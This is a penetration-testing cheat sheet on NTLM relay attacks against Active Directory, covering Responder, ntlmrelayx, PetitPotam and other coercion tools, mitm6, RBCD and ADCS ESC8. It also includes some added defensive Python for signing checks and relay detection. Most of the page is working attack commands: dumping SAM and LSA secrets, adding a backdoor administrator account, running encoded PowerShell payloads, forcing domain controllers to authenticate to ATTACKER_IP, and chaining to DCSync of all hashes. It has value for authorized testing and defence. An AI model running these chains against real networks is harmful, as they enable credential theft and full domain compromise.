Relay Attacks

Relay captured NTLM authentication to other services instead of cracking hashes. Extremely effective when SMB signing is disabled.

Danger

Relay attacks can cause service disruption. Test in controlled environments first and ensure you have proper authorization.

Tool Installation

Required Tools

Impacket (ntlmrelayx) - NTLM relay toolkit

pip install impacket

GitHub: fortra/impacket

mitm6 - IPv6 DNS takeover

pip install mitm6

GitHub: dirkjanm/mitm6

PetitPotam - MS-EFSRPC coercion

git clone https://github.com/topotam/PetitPotam

GitHub: topotam/PetitPotam

Coercer - Multi-protocol coercion

pip install coercer

GitHub: p0dalirius/Coercer

Prerequisites Check

Check SMB Signing

NTLM relay to SMB requires SMB signing to be disabled or not required on the target. Most Windows clients have signing not required by default.

SMB Signing Defaults:

  • Domain Controllers - Signing required (cannot relay to DCs via SMB)
  • Windows Servers - Signing not required (relayable)
  • Windows Clients - Signing not required (relayable)

```bash
# CrackMapExec - generate relay target list (recommended)
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt

# Nmap SMB signing check
nmap -p445 --script smb-security-mode 192.168.1.0/24
nmap -p445 --script smb-security-mode 192.168.1.0/24 -oG - | grep 'not required'

# RunFinger (Responder toolkit)
cd /usr/share/responder/tools
python RunFinger.py -i 192.168.1.0/24

# NetExec (CrackMapExec successor)
nxc smb 192.168.1.0/24 --gen-relay-list targets.txt
```
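As an added illustration (not part of the original page or of any tool listed above), the Python below parses the SecurityMode field of an SMB2 NEGOTIATE response, which is the field the nmap script and --gen-relay-list evaluate, and maps it to the three cases in the defaults list; the responses are constructed inside the block, not captured from a network.

```python
import struct

SIGNING_ENABLED, SIGNING_REQUIRED = 0x0001, 0x0002   # SMB2 NEGOTIATE SecurityMode bits

def parse_negotiate_response(msg):
    """Parse an SMB2 NEGOTIATE response (bytes starting at the 64-byte SMB2 header)."""
    if msg[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    hdr_size, _credit, status, command = struct.unpack_from("<HHIH", msg, 4)
    if hdr_size != 64 or command != 0 or status != 0:      # Command 0 = NEGOTIATE
        raise ValueError("not a successful SMB2 NEGOTIATE response")
    body_size, sec_mode, dialect = struct.unpack_from("<HHH", msg, 64)
    if body_size != 65:                                     # fixed StructureSize of the response
        raise ValueError("unexpected NEGOTIATE response size")
    return {"dialect": dialect,
            "signing_enabled": bool(sec_mode & SIGNING_ENABLED),
            "signing_required": bool(sec_mode & SIGNING_REQUIRED)}

def signing_posture(info):
    """Map the two SecurityMode bits to the three cases in the defaults list."""
    if info["signing_required"]:
        return "required"                    # a relayed session is rejected
    if info["signing_enabled"]:
        return "enabled, not required"       # relayable: the server accepts unsigned sessions
    return "disabled"                        # relayable

def hosts_accepting_unsigned(responses):
    """responses: {host: negotiate bytes}. Hosts to remediate (enforce signing) first."""
    return sorted(h for h, m in responses.items()
                  if not parse_negotiate_response(m)["signing_required"])

def build_sample_response(sec_mode, dialect=0x0302):
    """Constructed SMB 3.0.2 NEGOTIATE response with the given SecurityMode (test data, not a capture)."""
    header = (b"\xfeSMB"
              + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0)   # Flags 1 = server response
              + b"\x00" * 16)                                                  # Signature
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, sec_mode, dialect, 0, b"\x00" * 16,
                       0, 8388608, 8388608, 8388608, 0, 0, 128, 0, 0) + b"\x00"  # fixed fields + Buffer
    return header + body
```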

NTLM Relay to SMB

Basic SMB Relay

Step 1: Configure Responder to not respond on SMB/HTTP (ntlmrelayx will handle these)

```bash
# Edit Responder configuration
sudo nano /etc/responder/Responder.conf

# Set these to Off:
SMB = Off
HTTP = Off
```

Step 2: Start Responder to poison LLMNR/NBT-NS (Terminal 1)

```bash
# Start Responder (with SMB/HTTP disabled in config)
sudo responder -I eth0 -dwPv
```

Step 3: Start ntlmrelayx to relay captured auth (Terminal 2)

```bash
# Basic relay - dumps SAM when successful
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support

# With command execution
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -c 'whoami'
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -c 'net user hacker P@ssw0rd! /add && net localgroup administrators hacker /add'

# Execute PowerShell encoded command
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -c 'powershell -enc BASE64_ENCODED_PAYLOAD'
```

Information

How it works: User's machine broadcasts LLMNR → Responder responds → User authenticates to attacker → ntlmrelayx forwards auth to target → Target executes commands with user's privileges
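Added example (mine, not from the page): a heuristic for spotting that flow on the target side. A relayed logon appears on the target as a 4624 network logon with the victim's workstation name but the relay host's source address; the records and the hostname-to-IP inventory below are constructed, and because the workstation field is client-supplied the output is a lead to triage, not proof.

```python
import ipaddress

# Constructed 4624 records (a subset of the event's fields), not real logs
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "jdoe", "WorkstationName": "WS01", "IpAddress": "192.168.1.50"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "jdoe", "WorkstationName": "WS01", "IpAddress": "192.168.1.200"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "svc_backup", "WorkstationName": "-", "IpAddress": "192.168.1.60"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "jdoe", "WorkstationName": "WS01", "IpAddress": "::ffff:192.168.1.50"},
    {"EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "jdoe", "WorkstationName": "WS01", "IpAddress": "127.0.0.1"},
]
# Constructed asset inventory: workstation name -> addresses it is known to use
INVENTORY = {"WS01": {"192.168.1.50"}, "SRV02": {"192.168.1.60"}}

def normalise_ip(raw):
    """Canonical IP string, unwrapping IPv4-mapped IPv6; None for loopback, '-' or garbage."""
    try:
        addr = ipaddress.ip_address(raw)
    except ValueError:
        return None
    if addr.version == 6 and addr.ipv4_mapped:
        addr = addr.ipv4_mapped
    return None if addr.is_loopback else str(addr)

def relay_suspects(events, inventory):
    """NTLM network logons whose source IP is not one the named workstation is known to use."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue                                   # only network logons carry a relayed NTLM auth
        if ev.get("AuthenticationPackageName", "").upper() != "NTLM":
            continue                                   # Kerberos logons are out of scope
        ip = normalise_ip(ev.get("IpAddress", "-"))
        if ip is None:
            continue                                   # nothing to compare against
        ws = ev.get("WorkstationName", "-").upper()
        if ws in ("-", ""):
            hits.append((ev["TargetUserName"], ip, "NTLM network logon without a workstation name"))
            continue
        known = inventory.get(ws)
        if known is None:
            hits.append((ev["TargetUserName"], ip, f"unknown workstation {ws}"))
        elif ip not in known:
            hits.append((ev["TargetUserName"], ip, f"{ws} is inventoried at {sorted(known)}"))
    return hits
```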

Relay with SAM Dump

```bash
# Dump SAM database from relayed target
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support --dump-sam

# Dump LSA secrets
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support --dump-lsa
```

Interactive SMB Shell

```bash
# Get interactive SMB shell
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -i

# Connect to the shell (when relay happens)
nc 127.0.0.1 11000

# Available commands: shares, use, cd, ls, get, put, cat, info
```

LDAP Relay

Relaying to LDAP/LDAPS allows modifying Active Directory objects. Requires relaying a privileged user or exploiting default AD permissions.

LDAP vs LDAPS:

  • LDAP (389) - No channel binding; relay succeeds as long as LDAP signing is not required
  • LDAPS (636) - Needed for some operations; relay fails when LDAP channel binding (EPA) is enforced

Relay to LDAP - Add Computer

By default, any domain user can add up to 10 computer accounts (ms-DS-MachineAccountQuota).

```bash
# Relay to LDAP and add a computer account
sudo ntlmrelayx.py -t ldap://DC_IP --add-computer YOURPC 'Password123!'

# Relay to LDAPS (more reliable for some operations)
sudo ntlmrelayx.py -t ldaps://DC_IP --add-computer

# After adding computer, you can use it for RBCD attacks
# Check the computer was created
crackmapexec ldap DC_IP -u user -p pass -M maq
```

Relay to LDAP - Resource-Based Constrained Delegation (RBCD)

Configure delegation on target computer to allow your controlled machine to impersonate users.

```bash
# Step 1: Relay to LDAP with delegate-access flag
sudo ntlmrelayx.py -t ldap://DC_IP --delegate-access --escalate-user YOURPC$

# This modifies msDS-AllowedToActOnBehalfOfOtherIdentity on the target

# Step 2: Use S4U to get a service ticket as Administrator
# Request a service ticket for TARGET impersonating Administrator (S4U2Self/S4U2Proxy) with your computer account
getST.py -spn cifs/TARGET.corp.local corp.local/YOURPC$:'Password123!' -impersonate Administrator

# Step 3: Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass TARGET.corp.local
secretsdump.py -k -no-pass TARGET.corp.local
```
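Added audit example (not from the page or from impacket): the attribute modified in Step 1 is a binary security descriptor whose DACL lists the SIDs allowed to delegate to the computer, and this parses it and reports entries missing from an approved list. The descriptor and SIDs here are constructed; in practice the bytes are the computer object's msDS-AllowedToActOnBehalfOfOtherIdentity value read over LDAP.

```python
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004

def build_sid(sid_str):
    """Binary SID from 'S-1-5-21-...' text."""
    parts = sid_str.split("-")
    rev, auth, subs = int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def parse_sid(buf, off):
    """Text SID from a binary SID at buf[off:]; returns (sid, length)."""
    rev, count = buf[off], buf[off + 1]
    auth = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, auth) + "".join("-%d" % s for s in subs), 8 + 4 * count

def build_rbcd_descriptor(sids, mask=0xF01FF):
    """Constructed self-relative security descriptor: one ACCESS_ALLOWED ACE per SID (test data)."""
    aces = b"".join(struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(s), mask) + s
                    for s in map(build_sid, sids))
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces   # ACL_REVISION 2
    # Revision 1, control SE_SELF_RELATIVE|SE_DACL_PRESENT, no owner/group/SACL, DACL at offset 20
    return struct.pack("<BBHIIII", 1, 0, 0x8000 | SE_DACL_PRESENT, 0, 0, 0, 20) + acl

def rbcd_allowed_sids(sd):
    """[(sid, access_mask)] for every allow ACE in the descriptor's DACL."""
    _rev, _sbz, control, _own, _grp, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []                                   # no DACL: no delegation entries
    _arev, _sbz1, _size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, out = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            out.append((parse_sid(sd, off + 8)[0], mask))
        off += ace_size                             # skip other ACE types by their declared size
    return out

def unexpected_delegators(sd, approved):
    """SIDs granted delegation that are not on the approved list: review or remove them."""
    return [sid for sid, _ in rbcd_allowed_sids(sd) if sid not in approved]

# Constructed: one approved front-end host and one account nobody signed off on
SAMPLE_SD = build_rbcd_descriptor(["S-1-5-21-1111-2222-3333-1105", "S-1-5-21-1111-2222-3333-4242"])
APPROVED = {"S-1-5-21-1111-2222-3333-1105"}
```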

Tip

Full RBCD Chain: Coerce auth (PetitPotam) → Relay to LDAP → Add computer account → Set RBCD delegation → S4U2Self/S4U2Proxy → Admin ticket → DCSync

Authentication Coercion

Coercion techniques force a target machine to authenticate to your attacker machine, providing credentials to relay.

Coercion Methods:

  • PetitPotam - MS-EFSRPC (EFS) - Most common
  • PrinterBug - MS-RPRN (Print Spooler)
  • DFSCoerce - MS-DFSNM (DFS)
  • ShadowCoerce - MS-FSRVP (File Server VSS)
  • Coercer - Tests all methods automatically

Coercer - Test All Methods

Coercer automatically tests multiple coercion techniques to find working methods.

```bash
# Install Coercer
pip install coercer

# Scan for coercion vulnerabilities
coercer scan -t TARGET_IP -u user -p password -d corp.local

# Coerce authentication to attacker
coercer coerce -l ATTACKER_IP -t TARGET_IP -u user -p password -d corp.local

# Target specific method
coercer coerce -l ATTACKER_IP -t TARGET_IP -u user -p password -d corp.local --filter-method-name PetitPotam
```

PetitPotam

```bash
# Download PetitPotam
git clone https://github.com/topotam/PetitPotam.git
cd PetitPotam

# Unauthenticated coercion (if vulnerable - patched systems require auth)
python PetitPotam.py ATTACKER_IP TARGET_IP

# Authenticated (works on patched systems)
python PetitPotam.py -d corp.local -u user -p 'password' ATTACKER_IP TARGET_IP

# Full attack chain with AD CS
# Terminal 1: Start relay to ADCS
sudo ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Terminal 2: Trigger coercion
python PetitPotam.py ATTACKER_IP DC_IP
```

PrinterBug (SpoolSample)

Requires Print Spooler service running on target (common on workstations and servers).

```bash
# Check if Print Spooler is running
rpcdump.py @TARGET_IP | grep -i spoolsv
crackmapexec smb TARGET_IP -u user -p pass -M spooler

# Python PrinterBug
git clone https://github.com/dirkjanm/krbrelayx.git
python krbrelayx/printerbug.py corp.local/user:password@TARGET ATTACKER_IP

# Windows SpoolSample.exe
SpoolSample.exe TARGET ATTACKER

# Requires auth, triggers callback from TARGET to ATTACKER
```

DFSCoerce

Coerces authentication via the DFS service (Distributed File System).

```bash
# Download DFSCoerce
git clone https://github.com/Wh04m1001/DFSCoerce.git
cd DFSCoerce

# Coerce via DFS
python dfscoerce.py -d corp.local -u user -p password ATTACKER TARGET

# DFS typically requires authentication
```

IPv6 DNS Takeover (mitm6)

mitm6 exploits Windows' default IPv6 configuration to become the DNS server and redirect traffic.

How it works:

  1. Windows prefers IPv6 over IPv4 by default
  2. mitm6 sends DHCPv6 replies to become the DNS server
  3. Victim queries DNS through attacker
  4. Attacker responds with own IP for WPAD proxy
  5. Victim authenticates to attacker's fake proxy
  6. Credentials relayed to target (LDAP/ADCS)

```bash
# Install mitm6
pip install mitm6

# Start mitm6 to poison IPv6 DNS
sudo mitm6 -d corp.local

# Combined with ntlmrelayx for WPAD (full attack)
# Terminal 1: Start mitm6
sudo mitm6 -d corp.local

# Terminal 2: Start ntlmrelayx with WPAD
sudo ntlmrelayx.py -6 -t ldaps://DC_IP -wh wpad.corp.local --delegate-access

# -6: Enable IPv6
# -wh: WPAD host to serve
# --delegate-access: Configure RBCD on relayed computer

# Wait for machines to refresh DHCP/DNS (can take minutes to hours)
# Works best during business hours when users are logging in
```

Warning

Patience Required: mitm6 attacks can take time as they rely on DHCPv6 lease renewal. Best run during work hours when machines are actively being used.

Relay to ADCS (ESC8)

Active Directory Certificate Services web enrollment is often vulnerable to NTLM relay attacks. This is known as ESC8.

ESC8 Requirements:

  • Web Enrollment enabled on Certificate Authority
  • HTTP endpoints (not HTTPS with EPA)
  • Certificate template that allows authentication (Machine, User, DomainController)

Enumerate ADCS

```bash
# Find ADCS with CrackMapExec
crackmapexec ldap DC_IP -u user -p pass -M adcs

# Find with certipy
certipy find -u user@corp.local -p password -dc-ip DC_IP

# Check for vulnerable web enrollment
curl -I http://CA_IP/certsrv/
# 401 response (authentication requested over plain HTTP) = web enrollment endpoint present
```

Relay Attack Chain

```bash
# Step 1: Start relay to ADCS web enrollment
sudo ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Step 2: Trigger coercion from DC
python PetitPotam.py ATTACKER_IP DC_IP

# Step 3: ntlmrelayx will output a Base64 certificate
# Save it to a file and convert
echo 'BASE64_CERT' | base64 -d > dc.pfx

# Step 4: Authenticate with certificate
certipy auth -pfx dc.pfx -dc-ip DC_IP

# Step 5: You now have DC machine hash - DCSync!
secretsdump.py -hashes :NTLM_HASH corp.local/DC$@DC_IP
```

Tip

ESC8 to Domain Admin: PetitPotam to DC → Relay to ADCS → DC Certificate → Authenticate as DC → DCSync all hashes

Multi-Relay with SOCKS Proxy

SOCKS mode keeps sessions open, allowing you to use multiple tools through relayed connections.

```bash
# Start ntlmrelayx in SOCKS mode
sudo ntlmrelayx.py -tf targets.txt -smb2support -socks

# List active sessions in ntlmrelayx console
socks

# Configure proxychains
# Edit /etc/proxychains4.conf:
# socks4 127.0.0.1 1080

# Use tools through SOCKS (no password needed - using relayed session)
proxychains secretsdump.py -no-pass corp.local/admin@TARGET
proxychains smbclient.py -no-pass corp.local/admin@TARGET
proxychains reg.py -no-pass corp.local/admin@TARGET query -keyName 'HKLM\SAM'
```

SOCKS Session Notes:

  • Sessions are user-to-target specific
  • Use socks command in ntlmrelayx to list active sessions
  • AdminStatus shows if user has admin on target
  • Sessions timeout after period of inactivity

Tip

When relaying, the captured credential's privileges apply on the target. A domain admin credential relayed to a workstation gives admin access on that workstation.

External Resources